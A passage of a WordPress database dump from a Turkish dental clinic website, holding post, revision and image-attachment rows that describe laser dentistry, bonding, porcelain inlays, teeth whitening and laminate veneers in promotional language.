(6327, 1, '2018-07-13 17:35:03', '2018-07-13 14:35:03', '[vc_row][vc_column][vc_column_text]<strong>Lazer ile tedavinin uygulama alanları</strong>\r\n\r\nLazer enerjisi diğer tıp alanlarında kullanıldığı gibi diş hekimliğinde de aktif bir biçimde kullanılabilmektedir. Son yıllara kadar sadece dişetleri gibi yumuşak doku ve beyazlatmada kullanılan lazer enerjisi, atomize su ile birleştirilip elde edilen hidrokinetik enerji sayesinde diş, kemik gibi sert dokularda da kullanılmaya başlanmıştır.\r\n\r\nUygulama alanları sıralamak gerekirse;\r\nLazer ile dolgu öncesi ağız hazırlığı - çürük temizlenmesi\r\nKanal tedavisi\r\nDişeti tedavileri\r\n<ul>\r\n 	<li>Estetik amaçlı gülme hattının düzenlenmesi (özellikle güldüğü zaman dişetleri çok görünen hastalarda)</li>\r\n 	<li>Küretaj (derin dişeti temizliği)</li>\r\n 	<li>Depigmentasyon (dişetlerinde oluşan pigmentlerin temizliği)</li>\r\n 	<li>Yumuşak doku lezyonlarının çıkarılması</li>\r\n</ul>\r\nAft ve uçuk tedavileri\r\nDiş hassasiyetleri tedavisi (dentin kanallarının kapatılması)\r\nDiş beyazlatma\r\nCerrahi tedaviler (20 yaş dişleri, implant, ağız ve çene ameliyatları gibi)\r\nBiostimülasyon (cerrahi operasyon sonrasında duyulan ağrıların oluşumunun önlenmesi gibi)\r\n\r\nYukarıda sayılan lazer ile tedavi yöntemlerinde hastaların tedavi sonrası iyileşme süreçleri çok daha kısa olup, memnuniyetleri klasik yöntemlere göre çok daha yüksek olmaktadır.[/vc_column_text][vc_column_text]<strong>Lazer ile tedavinin avantajları</strong>\r\n\r\nLazer ile diş tedavisinde diğer dokulara temas edilmeden çalışıldığı için ısı ve titreşim oluşmaz. Bu nedenle hastada ağrı oluşmaz ve anesteziye gerek kalmadan diş tedavileri yapılabilir. Lazerin bu özelliği anestezi yapılamayan, korkan ve ciddi bir rahatsızlığı olan hastalarda lazeri tercih sebebi yapar. Ayrıca anestezi sonrası duyulan şişkinlik, yemek yiyememe, konuşma zorluğu gibi rahatsızlıklar oluşmaz.\r\n\r\nHastaları rahatsız eden ve cihazlarımızdan çıkan yüksek ses lazerde yoktur. Bu nedenle hastalarımız daha konforlu bir tedavi görmektedir.\r\n\r\nLazer ile yapılan cerrahi tedavilerde hastada kanama oluşmaz. Ayrıca su ile çalışıldığı ve normalden daha az travma verildiği için operasyon sonrası oluşabilecek şişme, morluk gibi komplikasyonlar önlenmiş olur.[/vc_column_text][/vc_column][/vc_row]', 'Lazer ile Tedavi', '', 'inherit', 'closed', 'closed', '', '6322-revision-v1', '', '', '2018-07-13 17:35:03', '2018-07-13 14:35:03', '', 6322, 'http://www.ze-dent.com/6322-revision-v1/', 0, 'revision', '', 0),
(6328, 1, '2018-07-13 17:53:34', '2018-07-13 14:53:34', '[vc_row][vc_column][vc_column_text]<strong>Lazer ile tedavinin uygulama alanları</strong>\r\n\r\nLazer enerjisi diğer tıp alanlarında kullanıldığı gibi diş hekimliğinde de aktif bir biçimde kullanılabilmektedir. Son yıllara kadar sadece dişetleri gibi yumuşak doku ve beyazlatmada kullanılan lazer enerjisi, atomize su ile birleştirilip elde edilen hidrokinetik enerji sayesinde diş, kemik gibi sert dokularda da kullanılmaya başlanmıştır.\r\n\r\n<strong>Uygulama alanları sıralamak gerekirse;</strong>\r\n<ul>\r\n 	<li>Lazer ile dolgu öncesi ağız hazırlığı - çürük temizlenmesi</li>\r\n 	<li>Kanal tedavisi</li>\r\n 	<li>Dişeti tedavileri\r\n<ul>\r\n 	<li>Estetik amaçlı gülme hattının düzenlenmesi (özellikle güldüğü zaman dişetleri çok görünen hastalarda)</li>\r\n 	<li>Küretaj (derin dişeti temizliği)</li>\r\n 	<li>Depigmentasyon (dişetlerinde oluşan pigmentlerin temizliği)</li>\r\n 	<li>Yumuşak doku lezyonlarının çıkarılması</li>\r\n</ul>\r\n</li>\r\n 	<li>Aft ve uçuk tedavileri</li>\r\n 	<li>Diş hassasiyetleri tedavisi (dentin kanallarının kapatılması)</li>\r\n 	<li>Diş beyazlatma</li>\r\n 	<li>Cerrahi tedaviler (20 yaş dişleri, implant, ağız ve çene ameliyatları gibi)</li>\r\n 	<li>Biostimülasyon (cerrahi operasyon sonrasında duyulan ağrıların oluşumunun önlenmesi gibi)</li>\r\n</ul>\r\nYukarıda sayılan lazer ile tedavi yöntemlerinde hastaların tedavi sonrası iyileşme süreçleri çok daha kısa olup, memnuniyetleri klasik yöntemlere göre çok daha yüksek olmaktadır.[/vc_column_text][vc_column_text]<strong>Lazer ile tedavinin avantajları</strong>\r\n\r\nLazer ile diş tedavisinde diğer dokulara temas edilmeden çalışıldığı için ısı ve titreşim oluşmaz. Bu nedenle hastada ağrı oluşmaz ve anesteziye gerek kalmadan diş tedavileri yapılabilir. Lazerin bu özelliği anestezi yapılamayan, korkan ve ciddi bir rahatsızlığı olan hastalarda lazeri tercih sebebi yapar. Ayrıca anestezi sonrası duyulan şişkinlik, yemek yiyememe, konuşma zorluğu gibi rahatsızlıklar oluşmaz.\r\n\r\nHastaları rahatsız eden ve cihazlarımızdan çıkan yüksek ses lazerde yoktur. Bu nedenle hastalarımız daha konforlu bir tedavi görmektedir.\r\n\r\nLazer ile yapılan cerrahi tedavilerde hastada kanama oluşmaz. Ayrıca su ile çalışıldığı ve normalden daha az travma verildiği için operasyon sonrası oluşabilecek şişme, morluk gibi komplikasyonlar önlenmiş olur.[/vc_column_text][/vc_column][/vc_row]', 'Lazer ile Tedavi', '', 'inherit', 'closed', 'closed', '', '6322-revision-v1', '', '', '2018-07-13 17:53:34', '2018-07-13 14:53:34', '', 6322, 'http://www.ze-dent.com/6322-revision-v1/', 0, 'revision', '', 0),
(6329, 1, '2018-07-13 17:58:12', '2018-07-13 14:58:12', '[vc_row][vc_column][vc_column_text]<strong>Adeziv (Bonding) Sistem</strong>\r\n\r\nDişin rengini veya şeklini değiştirmek, büyütmek ya da bir kusurunu tedavi etmek amacıyla dişe yapılan ilavelerdir. Bu amaçla kullanılan malzemeler(mikrofil ajanlar), doğal dişin dış yüzeyine tutturularak şekil ve renk bozuklukları kolayca giderilebilir.\r\n\r\nBonding, günümüzde en çok ve en son uygulanan koruyucu dişhekimliği işlemlerinden biridir. Çoğu durumda, en az miktarda diş kaybı ile bu işlem gerçekleştirilir. Pek çok durumda, dişi uyuşturmaya bile gerek duymadan bu işlem uygulanabilir. Kozmetik dişhekimliğinde yetkin bir hekim tarafından yapıldığında doğal görünür.\r\n\r\nSize, güzel ve kendinizden emin bir gülümseme armağan edecek olan bu işlem için pek çok kez bir seans (15 dak. – 1 saat) yeterlidir. Uygulanacak seans sayısı, yapılacak işleme göre değişir. Genellikle diğer estetik işlemlere göre daha ekonomiktir.\r\n\r\nHemen hemen bütün yaş gruplarına bu tedavi metodu uygulanabilir.\r\nÇocuklar, ergenlik çağındakiler, yetişkinler ve yaşlılar görünüşlerini ve gülümsemelerini bu metot sayesinde daha da güzelleştirebilirler.\r\n<img src=\"http://localhost/zdent/adeziv-bonding-sistemi-kompozit/wp-content/uploads/2012/07/Adeziv-Sistem-Bonding.jpg\" alt=\"\" />\r\n<strong>Adeziv sistem uygulanan dişlerde renk değişimi olgusu</strong>\r\n\r\nMikrofil ajanlar, en ileri tekniklerle elde edilmiş olup, hemen hemen diş yapısıyla aynı özellikler taşırlar ve ancak normal dişler kadar renk değiştirirler. Yüzey pürüzlülüğü, cilalama ile en aza indirildiğinde lekelenmeye karşı dayanıklılığı artar. Dış faktörlerin sebep olduğu (sigara, çay, kola, kahve vb.) olası lekelenmeler ise, rutin diş muayenelerinde giderilebilir.\r\n\r\nAncak Bonding’in uygulandığı dişler konusunda bazı sınırlamalar mevcuttur. Çok sert nesneleri (buz, şeker gibi) ısırmaktan kaçınmalıdır. Ayrıca tırnak yeme gibi olumsuz alışkanlıklardan uzak kalınmalıdır.\r\n\r\nBu süre, kullanılan malzemenin kalitesine ve dişhekiminin becerisine bağlıdır. Son teknoloji ile üretilen malzemelerin ömrü 5 ila 10 yıldır. Bonding (adeziv sistem) uygulanmış bir dişe, daha sonra yeniden bir bonding işlemi yapılabilir.[/vc_column_text][/vc_column][/vc_row]', 'Adeziv (Bonding) Sistemi / Kompozit', '', 'publish', 'closed', 'closed', '', 'adeziv-bonding-sistemi-kompozit', '', '', '2018-07-13 17:58:12', '2018-07-13 14:58:12', '', 0, 'http://www.ze-dent.com/?post_type=us_portfolio&#038;p=6329', 0, 'us_portfolio', '', 0),
(6330, 1, '2018-07-13 17:57:56', '2018-07-13 14:57:56', '', 'adeviz', '', 'inherit', 'closed', 'closed', '', 'adeviz', '', '', '2018-07-13 17:57:56', '2018-07-13 14:57:56', '', 6329, 'http://www.ze-dent.com/wp-content/uploads/2018/07/adeviz.jpg', 0, 'attachment', 'image/jpeg', 0),
(6331, 1, '2018-07-13 17:58:12', '2018-07-13 14:58:12', '[vc_row][vc_column][vc_column_text]<strong>Adeziv (Bonding) Sistem</strong>\r\n\r\nDişin rengini veya şeklini değiştirmek, büyütmek ya da bir kusurunu tedavi etmek amacıyla dişe yapılan ilavelerdir. Bu amaçla kullanılan malzemeler(mikrofil ajanlar), doğal dişin dış yüzeyine tutturularak şekil ve renk bozuklukları kolayca giderilebilir.\r\n\r\nBonding, günümüzde en çok ve en son uygulanan koruyucu dişhekimliği işlemlerinden biridir. Çoğu durumda, en az miktarda diş kaybı ile bu işlem gerçekleştirilir. Pek çok durumda, dişi uyuşturmaya bile gerek duymadan bu işlem uygulanabilir. Kozmetik dişhekimliğinde yetkin bir hekim tarafından yapıldığında doğal görünür.\r\n\r\nSize, güzel ve kendinizden emin bir gülümseme armağan edecek olan bu işlem için pek çok kez bir seans (15 dak. – 1 saat) yeterlidir. Uygulanacak seans sayısı, yapılacak işleme göre değişir. Genellikle diğer estetik işlemlere göre daha ekonomiktir.\r\n\r\nHemen hemen bütün yaş gruplarına bu tedavi metodu uygulanabilir.\r\nÇocuklar, ergenlik çağındakiler, yetişkinler ve yaşlılar görünüşlerini ve gülümsemelerini bu metot sayesinde daha da güzelleştirebilirler.\r\n<img src=\"http://localhost/zdent/adeziv-bonding-sistemi-kompozit/wp-content/uploads/2012/07/Adeziv-Sistem-Bonding.jpg\" alt=\"\" />\r\n<strong>Adeziv sistem uygulanan dişlerde renk değişimi olgusu</strong>\r\n\r\nMikrofil ajanlar, en ileri tekniklerle elde edilmiş olup, hemen hemen diş yapısıyla aynı özellikler taşırlar ve ancak normal dişler kadar renk değiştirirler. Yüzey pürüzlülüğü, cilalama ile en aza indirildiğinde lekelenmeye karşı dayanıklılığı artar. Dış faktörlerin sebep olduğu (sigara, çay, kola, kahve vb.) olası lekelenmeler ise, rutin diş muayenelerinde giderilebilir.\r\n\r\nAncak Bonding’in uygulandığı dişler konusunda bazı sınırlamalar mevcuttur. Çok sert nesneleri (buz, şeker gibi) ısırmaktan kaçınmalıdır. Ayrıca tırnak yeme gibi olumsuz alışkanlıklardan uzak kalınmalıdır.\r\n\r\nBu süre, kullanılan malzemenin kalitesine ve dişhekiminin becerisine bağlıdır. Son teknoloji ile üretilen malzemelerin ömrü 5 ila 10 yıldır. Bonding (adeziv sistem) uygulanmış bir dişe, daha sonra yeniden bir bonding işlemi yapılabilir.[/vc_column_text][/vc_column][/vc_row]', 'Adeziv (Bonding) Sistemi / Kompozit', '', 'inherit', 'closed', 'closed', '', '6329-revision-v1', '', '', '2018-07-13 17:58:12', '2018-07-13 14:58:12', '', 6329, 'http://www.ze-dent.com/6329-revision-v1/', 0, 'revision', '', 0),
(6332, 1, '2018-07-13 18:02:13', '2018-07-13 15:02:13', '[vc_row][vc_column][vc_column_text]<strong>Inlay-Onlay Porselen Dolgular</strong>\r\n\r\nDişte fazla madde kaybı varsa diş dolgusu kaçınılmazdır. Ve genelde arka azı dişlerde uygulanmaktadır. Diş dolguları hem estetik olup hem de çiğneme basınçlarına dirençli, uzun vadede güvenilir bir tedavi şeklidir. Dolgu yaparken ana kural olarak iyi bir kavite (oyuk) hazırlanır ve dişe yapılacak dolguyla çürümeden önceki doğal biçimi tekrar verilmeye çalışılır. Kullanılan dolgu tipi, dişin konumuna ve işlevine bağlıdır.\r\n\r\nÇiğneme işlevinin çoğunu yapan azı dişleri daha fazla basınca maruz kalırlar ve ön dişlerden daha dayanıklı bir maddeye gereksinimleri vardır. Önceden en yaygın dolgu malzemesi gümüş amalgam idi ve arka dişlerde kullanılmaktaydı. Bu tür dolgular aslında civa, gümüş ve diğer metal alaşımlarıdır. Ancak görünümleri itibariyle estetik karşılanmamaktadır.\r\n\r\nYine ön bölge dişlerde madde kaybına bağlı olarak dolgu uygulamaları yapmak gerekebilir. Porselen dolgular çok fazla madde kaybı olan ve dişin tümden küçültülerek kuron uygulaması gerektiren durumlarda sağlıklı diş dokusunu korumak amaçlı geliştirilmiş bir dolgu yöntemidir. Daha estetik ve kullanışlı olduğundan amalgam dolguların yerine tercih edilmektedir.\r\n\r\nİlk seansta dişin hastalıklı bölgeleri dışında, sağlıklı dokusundan tutuculuk için hiçbir aşındırma yapılmadan hazırlanan kavitelerin ölçüleri laboratuara gönderilir. Burada hastanın bu dişine özel hazırlanan dişin eksik olan yapısını tamamlayan porselenden dolgu hazırlanır ve 2. seansta hastanın dişine yapıştırılır.\r\n\r\nDişle aynı sertlikte olan bu porselen dolgu, ısırma kuvvetlerinden oluşan kırılmaları önler ve dişin eskisi kadar sağlıklı olmasını sağlar.\r\nDiş renginde olduğu için dolgu çıplak gözle ayırt edilemeyecek kadar doğaldır.[/vc_column_text][us_single_image image=\"6333\" size=\"full\" align=\"center\"][/vc_column][/vc_row]', 'Inlay - Onlay Porselen Dolgular', '', 'publish', 'closed', 'closed', '', 'inlay-onlay-porselen-dolgular', '', '', '2018-07-13 18:02:13', '2018-07-13 15:02:13', '', 0, 'http://www.ze-dent.com/?post_type=us_portfolio&#038;p=6332', 0, 'us_portfolio', '', 0),
(6333, 1, '2018-07-13 18:01:36', '2018-07-13 15:01:36', '', 'Porselen-Dis-Dolgulari', '', 'inherit', 'closed', 'closed', '', 'porselen-dis-dolgulari', '', '', '2018-07-13 18:01:36', '2018-07-13 15:01:36', '', 6332, 'http://www.ze-dent.com/wp-content/uploads/2018/07/Porselen-Dis-Dolgulari.jpg', 0, 'attachment', 'image/jpeg', 0),
(6334, 1, '2018-07-13 18:01:39', '2018-07-13 15:01:39', '', 'porselendolgu', '', 'inherit', 'closed', 'closed', '', 'porselendolgu', '', '', '2018-07-13 18:01:39', '2018-07-13 15:01:39', '', 6332, 'http://www.ze-dent.com/wp-content/uploads/2018/07/porselendolgu.jpg', 0, 'attachment', 'image/jpeg', 0),
(6335, 1, '2018-07-13 18:02:13', '2018-07-13 15:02:13', '[vc_row][vc_column][vc_column_text]<strong>Inlay-Onlay Porselen Dolgular</strong>\r\n\r\nDişte fazla madde kaybı varsa diş dolgusu kaçınılmazdır. Ve genelde arka azı dişlerde uygulanmaktadır. Diş dolguları hem estetik olup hem de çiğneme basınçlarına dirençli, uzun vadede güvenilir bir tedavi şeklidir. Dolgu yaparken ana kural olarak iyi bir kavite (oyuk) hazırlanır ve dişe yapılacak dolguyla çürümeden önceki doğal biçimi tekrar verilmeye çalışılır. Kullanılan dolgu tipi, dişin konumuna ve işlevine bağlıdır.\r\n\r\nÇiğneme işlevinin çoğunu yapan azı dişleri daha fazla basınca maruz kalırlar ve ön dişlerden daha dayanıklı bir maddeye gereksinimleri vardır. Önceden en yaygın dolgu malzemesi gümüş amalgam idi ve arka dişlerde kullanılmaktaydı. Bu tür dolgular aslında civa, gümüş ve diğer metal alaşımlarıdır. Ancak görünümleri itibariyle estetik karşılanmamaktadır.\r\n\r\nYine ön bölge dişlerde madde kaybına bağlı olarak dolgu uygulamaları yapmak gerekebilir. Porselen dolgular çok fazla madde kaybı olan ve dişin tümden küçültülerek kuron uygulaması gerektiren durumlarda sağlıklı diş dokusunu korumak amaçlı geliştirilmiş bir dolgu yöntemidir. Daha estetik ve kullanışlı olduğundan amalgam dolguların yerine tercih edilmektedir.\r\n\r\nİlk seansta dişin hastalıklı bölgeleri dışında, sağlıklı dokusundan tutuculuk için hiçbir aşındırma yapılmadan hazırlanan kavitelerin ölçüleri laboratuara gönderilir. Burada hastanın bu dişine özel hazırlanan dişin eksik olan yapısını tamamlayan porselenden dolgu hazırlanır ve 2. seansta hastanın dişine yapıştırılır.\r\n\r\nDişle aynı sertlikte olan bu porselen dolgu, ısırma kuvvetlerinden oluşan kırılmaları önler ve dişin eskisi kadar sağlıklı olmasını sağlar.\r\nDiş renginde olduğu için dolgu çıplak gözle ayırt edilemeyecek kadar doğaldır.[/vc_column_text][us_single_image image=\"6333\" size=\"full\" align=\"center\"][/vc_column][/vc_row]', 'Inlay - Onlay Porselen Dolgular', '', 'inherit', 'closed', 'closed', '', '6332-revision-v1', '', '', '2018-07-13 18:02:13', '2018-07-13 15:02:13', '', 6332, 'http://www.ze-dent.com/6332-revision-v1/', 0, 'revision', '', 0),
(6336, 1, '2018-07-13 18:07:48', '2018-07-13 15:07:48', '[vc_row][vc_column][vc_column_text]<strong>Diş Beyazlatma (Bleaching)</strong>\r\n\r\nDiş beyazlatma, görsel sonuçları son derece tatmin edici olan bir uygulamadır. Diş beyazlatma işleminin diş sağlığı açısından eksileri yoktur. Buna en güzel örnek biz diş hekimlerinin de diş beyazlatmayı kendimiz için uygulamış olmamızdır.\r\n\r\nİki çeşit beyazlatma yöntemi vardır: Evde uygulanan beyazlatma ve kliniklerde uygulanan beyazlatma yöntemi. En sağlıklı olan kesinlikle hekim kontrolünde olması yönünden kliniklerde uygulanan beyazlatma yöntemidir. Evde uygulanan beyazlatma yönteminde, diş etlerine sızan ilaçlar diş eti sorununa neden olacağından önermemekteyiz.\r\n\r\nKlinikte yapılan beyazlatma yönteminde öncelikle diş etleri opaldam ile koruma altına alınır. Daha sonra diş mine yüzeylerine bleaching (beyazlatma) ilacı uygulanır ve lazerle aktive edilir. Dişlerin dentin tübüllerindeki sıvı ile ilaçtaki sıvı yer değiştirir ve böylece dişlerde beyazlama meydana gelir.\r\n\r\nGenellikle 1 seans (ortalama 30 dakika) sürer ancak kişinin dişlerinin doğal beyazlığına bağlı en fazla 2-3 seans da sürebilir. Asitli içecekler, sigara, tetrasiklin içerikli ilaçlar, kahve ve şarap tüketilmesi önerilmemektedir. Asitli içecekler dişlerin hassasiyetini artıracağı için, kahve ve şarap ise renklendirici olduğu için önerilmemektedir.\r\n\r\n<strong>Diş beyazlatma işleminin etki süresi</strong>\r\n\r\nDiş beyazlatma işlemi 18 yaş ve üzerindeki hastalarımızda uygulanmaktadır. Etkisi uzun sürelidir. Beyazlatma uygulandıktan sonra tekrar diş renginde geriye dönüş söz konusu değildir. Ancak genetik nedenler, ilaç kullanımı gibi nedenlerden dolayı %5 oranında sonuç alamadığımız hastalarımız olmaktadır.\r\n\r\nBunlar dışında yapılan işlem sonrasında besinlerin dişlerdeki etkileri gidermek için detertraj (diş temizletme) yeterlidir. Ancak birey tekrarlatmak isterse işlem ancak 2 yıl sonra tekrar uygulanabilir.[/vc_column_text][/vc_column][/vc_row]', 'Diş Beyazlatma (Bleaching)', '', 'publish', 'closed', 'closed', '', 'dis-beyazlatma-bleaching', '', '', '2018-07-13 18:07:48', '2018-07-13 15:07:48', '', 0, 'http://www.ze-dent.com/?post_type=us_portfolio&#038;p=6336', 0, 'us_portfolio', '', 0),
(6337, 1, '2018-07-13 18:05:52', '2018-07-13 15:05:52', '', 'dis-beyazlatma', '', 'inherit', 'closed', 'closed', '', 'dis-beyazlatma', '', '', '2018-07-13 18:05:52', '2018-07-13 15:05:52', '', 6336, 'http://www.ze-dent.com/wp-content/uploads/2018/07/dis-beyazlatma.jpg', 0, 'attachment', 'image/jpeg', 0),
(6338, 1, '2018-07-13 18:05:55', '2018-07-13 15:05:55', '', 'Dis-Beyazlatma-Bleaching-Once-Sonra', '', 'inherit', 'closed', 'closed', '', 'dis-beyazlatma-bleaching-once-sonra', '', '', '2018-07-13 18:05:55', '2018-07-13 15:05:55', '', 6336, 'http://www.ze-dent.com/wp-content/uploads/2018/07/Dis-Beyazlatma-Bleaching-Once-Sonra.jpg', 0, 'attachment', 'image/jpeg', 0);
INSERT INTO `zdenl_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(6339, 1, '2018-07-13 18:07:48', '2018-07-13 15:07:48', '[vc_row][vc_column][vc_column_text]<strong>Diş Beyazlatma (Bleaching)</strong>\r\n\r\nDiş beyazlatma, görsel sonuçları son derece tatmin edici olan bir uygulamadır. Diş beyazlatma işleminin diş sağlığı açısından eksileri yoktur. Buna en güzel örnek biz diş hekimlerinin de diş beyazlatmayı kendimiz için uygulamış olmamızdır.\r\n\r\nİki çeşit beyazlatma yöntemi vardır: Evde uygulanan beyazlatma ve kliniklerde uygulanan beyazlatma yöntemi. En sağlıklı olan kesinlikle hekim kontrolünde olması yönünden kliniklerde uygulanan beyazlatma yöntemidir. Evde uygulanan beyazlatma yönteminde, diş etlerine sızan ilaçlar diş eti sorununa neden olacağından önermemekteyiz.\r\n\r\nKlinikte yapılan beyazlatma yönteminde öncelikle diş etleri opaldam ile koruma altına alınır. Daha sonra diş mine yüzeylerine bleaching (beyazlatma) ilacı uygulanır ve lazerle aktive edilir. Dişlerin dentin tübüllerindeki sıvı ile ilaçtaki sıvı yer değiştirir ve böylece dişlerde beyazlama meydana gelir.\r\n\r\nGenellikle 1 seans (ortalama 30 dakika) sürer ancak kişinin dişlerinin doğal beyazlığına bağlı en fazla 2-3 seans da sürebilir. Asitli içecekler, sigara, tetrasiklin içerikli ilaçlar, kahve ve şarap tüketilmesi önerilmemektedir. Asitli içecekler dişlerin hassasiyetini artıracağı için, kahve ve şarap ise renklendirici olduğu için önerilmemektedir.\r\n\r\n<strong>Diş beyazlatma işleminin etki süresi</strong>\r\n\r\nDiş beyazlatma işlemi 18 yaş ve üzerindeki hastalarımızda uygulanmaktadır. Etkisi uzun sürelidir. Beyazlatma uygulandıktan sonra tekrar diş renginde geriye dönüş söz konusu değildir. Ancak genetik nedenler, ilaç kullanımı gibi nedenlerden dolayı %5 oranında sonuç alamadığımız hastalarımız olmaktadır.\r\n\r\nBunlar dışında yapılan işlem sonrasında besinlerin dişlerdeki etkileri gidermek için detertraj (diş temizletme) yeterlidir. Ancak birey tekrarlatmak isterse işlem ancak 2 yıl sonra tekrar uygulanabilir.[/vc_column_text][/vc_column][/vc_row]', 'Diş Beyazlatma (Bleaching)', '', 'inherit', 'closed', 'closed', '', '6336-revision-v1', '', '', '2018-07-13 18:07:48', '2018-07-13 15:07:48', '', 6336, 'http://www.ze-dent.com/6336-revision-v1/', 0, 'revision', '', 0),
(6340, 1, '2018-07-13 18:12:21', '2018-07-13 15:12:21', '[vc_row][vc_column][vc_column_text]<strong>Laminate Veneer (lamine diş)</strong>\r\n\r\nLaminate veneer (laminant-laminat) Diş kaplamaları temel olarak, renk değişikliklerinin giderilmesi ve belli bir dereceye kadar şekil düzeltilmesi amacıyla yapılabilirler.\r\nBaşlıca uygulama alanları şu şekilde özetlenebilir:\r\nRenklenmelerde, bleaching (diş beyazlatma) gibi metotlarla sonuç alınmayan ileri derecedeki antibiyotik, flor vb.. lekelerinde kalıtsal yapı ve renk bozukluklarında,\r\n<ul>\r\n 	<li>Ayrık dişleri bitiştirmede (diastema kapama),</li>\r\n 	<li>Kırık veya aşınmış dişlerin restorasyonunda,</li>\r\n 	<li>Rengi ve yapısı bozulmuş eski dolguların düzeltilmesinde,</li>\r\n 	<li>Çapraşık ve eğri dişlerin düzeltilmesinde (ortodontik tedavi alternatifi olarak)mükemmele yakın kozmetik bir alternatif olabilir.</li>\r\n 	<li>Aralıklı dişlerin (diastema) laminate ile tedavisi</li>\r\n</ul>\r\n<strong>Laminate Veneer’in avantajları</strong>\r\n\r\nÇürük, aşınma, kırık veya yapısal anomalilerden dolayı, kendinizden emin bir şekilde gülümseyemediğiniz durumlarda dişlerinize bu metotla doğal bir güzellik kazandırmak mümkündür. Daha önceleri bu gibi olumsuz durumlarda dolgular ve tam kaplamalar tek çözüm iken günümüzde laminat tedavisi gibi yeni alternatifler mevcuttur.\r\n\r\n<strong>Bu uygulama ile;</strong>\r\n<ul>\r\n 	<li>Küçük bir müdahale ile çok kısa sürede sağlıklı ve doğal bir görünüş elde edilir.</li>\r\n 	<li>Dişinizde sadece, tırnak genişliğinde bir yuva açılması (ki bu da her zaman gerekmeyebilir) yeterlidir.</li>\r\n 	<li>Sağlam, renkleri bozulmayan ve dayanıklı malzemelerden üretilirler.</li>\r\n 	<li>Dişlerinizin doğal yapısı bozulmadan istediğiniz estetik özelliklere sahip olması sadece Laminate Veneer ile mümkündür. Diş üzerinde ya hiç bir değişiklik yapılmaz ya da az bir düzeltme ile sonucun daha mükemmel olması sağlanabilir. Zaten diş üzerinden kaldırılan miktar 0,3-0,7 mm ile sınırlı olmakta, böylece hiç bir dişin kesilmesine (küçültülmesine) gerek kalmamaktadır.</li>\r\n 	<li>Tedavinin laboratuar aşaması sadece 3-4 gündür. Ancak gülümseme tasarımında bu süre sonunda dudaklarınızın yeni görünümünüze uyum sağlaması 3-4 haftayı bulabilmektedir. Bu uyum süresince bazı dudak egzersizleri ve okuma tavsiye etmekteyiz. Bu süre sonunda yüzünüzle tamamen bütünleşmiş ve yapay olduğu kesinlikle fark edilmeyen yeni dişlerinizle rahatlıkla gülümseyebilirsiniz.</li>\r\n 	<li>Görünümünden memnun olmadığınız dişlerinizin bir kopyası elde edilerek üzerinde bir tasarım yapılabilir. Yani dişlerinize hiçbir müdahalede bulunmadan önce dişlerinizde oluşacak değişikliği görebilirsiniz.</li>\r\n 	<li>Porselen yüzeyleri son derece pürüzsüz olacağı için sigara ve benzeri sebeplerden kaynaklanan lekelenmeleri ve diş taşı oluşumlarını minimuma indirir.</li>\r\n 	<li>Kahve, çay, sigara gibi dış etkenlerle renk değiştirmez.</li>\r\n 	<li>Materyal olarak oldukça kırılgandır. Fakat mineye tam olarak yapıştırıldığında, germe ve çekme kuvvetlerine karşı direnci çok yükselir. Sözgelimi, yapışmış bir Veneer’i dişten bütün olarak sökmek mümkün değildir. Ancak elmas frezlerle diş yüzeyinden aşındırarak uzaklaştırılabilir.</li>\r\n 	<li>Aşınmaya karşı direnci yüksektir.</li>\r\n</ul>\r\n<strong>Laminate Veneer’in dezavantajları</strong>\r\n<ul>\r\n 	<li>Diğer restorasyonlara göre sağlık açısından üstünlükleri vardır. Ancak diğerlerine kıyasla biraz daha pahalı bir sistemdir.</li>\r\n 	<li>Hassas bir tekniktir. İyi bir klinik ve laboratuar çalışması gerektirir. Hekimin ve diş teknisyeninin bu konu üzerine teknik bilgisinin ve sanat yeteneğinin tam olması gerekir.</li>\r\n</ul>\r\n<strong>Laminate tedavinin uygulama aşamaları</strong>\r\n\r\nÖncelikle dişiniz işleme hazırlanır, üzerindeki artıklar temizlenir. Ardından dişinizin tam bir kopyasını elde etmek için ölçü alınır. Porselen malzemeden dişinize yapıştırılacak olan tabaka hazırlanır. Son olarak da, adeziv sistemlerde (bonding) olduğu gibi, lamineler de mevcut dişin yüzeyine rezinle (yapıştırıcı bir ara madde) kaynaştırılır.\r\n\r\nHer yaş grubundaki kişiler laminat tedavisinden yararlanabilir. Ancak, çene bozuklukları, tırnak yeme, kalem ısırma gibi kötü alışkanlıklar ileri derecede dişeti tahribatlarının mevcut olduğu durumlarda uygulanmaz. Buna en iyi karar verecek olan diş hekiminizdir.\r\n\r\nLaminateler iyi bir ağız bakımıyla yıllarca sorunsuz olarak kullanılabilirler. Çünkü diğer adeziv sistemlerden (bonding) daha üstün özelliklere sahip porselenden imal edilmişlerdir. Lekelenme ve aşınmaya karşı daha dirençlidirler. Ömürlerini uzatmak için ağız bakımına dikkat etmek gerekir. Ayrıca, çok sert gıdaları ısırmaktan, tırnak yemek gibi kötü alışkanlıklardan kaçınmak gerekir.[/vc_column_text][/vc_column][/vc_row]', 'Lamine Diş Kaplamaları', '', 'publish', 'closed', 'closed', '', 'lamine-dis-kaplamalari', '', '', '2018-07-13 18:12:21', '2018-07-13 15:12:21', '', 0, 'http://www.ze-dent.com/?post_type=us_portfolio&#038;p=6340', 0, 'us_portfolio', '', 0),
(6341, 1, '2018-07-13 18:11:25', '2018-07-13 15:11:25', '', 'lamine-kaplama', '', 'inherit', 'closed', 'closed', '', 'lamine-kaplama', '', '', '2018-07-13 18:11:25', '2018-07-13 15:11:25', '', 6340, 'http://www.ze-dent.com/wp-content/uploads/2018/07/lamine-kaplama.jpg', 0, 'attachment', 'image/jpeg', 0),
